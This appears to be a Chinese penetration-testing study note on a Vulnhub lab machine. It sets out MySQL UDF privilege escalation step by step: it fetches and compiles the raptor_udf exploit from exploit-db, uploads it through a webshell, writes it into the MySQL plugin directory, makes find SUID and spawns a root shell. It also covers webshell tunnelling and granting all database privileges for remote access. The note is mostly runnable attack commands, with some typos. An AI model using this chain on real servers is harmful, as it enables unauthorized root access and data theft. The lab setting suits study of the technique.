免责声明:本文仅做技术交流与学习,非法搞事后果自负...
目录
Vulnhub某靶机-探针IP及端口-利用漏洞获取web权限-信息收集-查看数据库配置文件-利用
Mysql提权Linux(Mysql版本区别同Windows)
- wget https://www.exploit-db.com/download/1518
-
- mv 1518 raptor_udf.c
-
- gcc -g -c raptor_udf.c
-
- gcc -g -shared -o raptor_udf.so raptor_udf.o -lc
-
- mv raptor_udf.so 1518.so
---下载1518.so---->上传到webshell上去.
上传或下载1518到目标服务器
wget https://xx.xx.xx.xx/1518.so
(连接到数据库执行命令)
- use mysql;
-
- create table foo(line blob);
-
- insert into foo values(load_file('/tmp/1518.so'));
-
- select * from foo into dumpfile'/usr/lib/mysql/plugin/1518.so";
- create function do_systemreturns integer soname'1518.so'
-
- select do_system(chmod u+s /usr/bin/find');
- #给哪个命令一个执行权限
--配合百科等等
find/-user root-perm -4000 -print 2>/dev/null
- touch xiaodi
-
- find xiaodi -exec "whoami"\;
-
- find xiaodi -exec "/bin/sh"\;
-
- id
Multiple.Database.Utilization.Tools-2.1.1
后门进去-->探针 Linenum.sh-->有mysql --->找数据库的配置文件 -->用 **MDUTMDUT**连接,(这个连接有问题)--(开了外连还是连接不上)
---发现连接不上,-->用**哥斯拉**的后门连接mysql,执行命令,开启外链.
(用navicat连接试一下)
连接不上,因为此靶场-->
防火墙过滤 .
开了外连 还是连接不上 查看user数据 已经设置外联.
外部到里面不行 --
1、手工提权(在webshell上面的数据库管理进行提权)自己连接自己
2.隧道出网(用外部或本机的工具项目提权建立隧道)
里面出来外部
让webshell服务器3306转到本地的3300连接
--冰蝎内网穿透--http隧道 ----- MDUTMDUT连上直接提权.(数据库5种都能提)(不用考虑操作系统)
--内网渗透后面详解...
- GRANT ALL PRIVILEGES ON . TO '账号' IDENTIFIED BY '密码' WITH GRANT OPTION;
-
- flush privileges;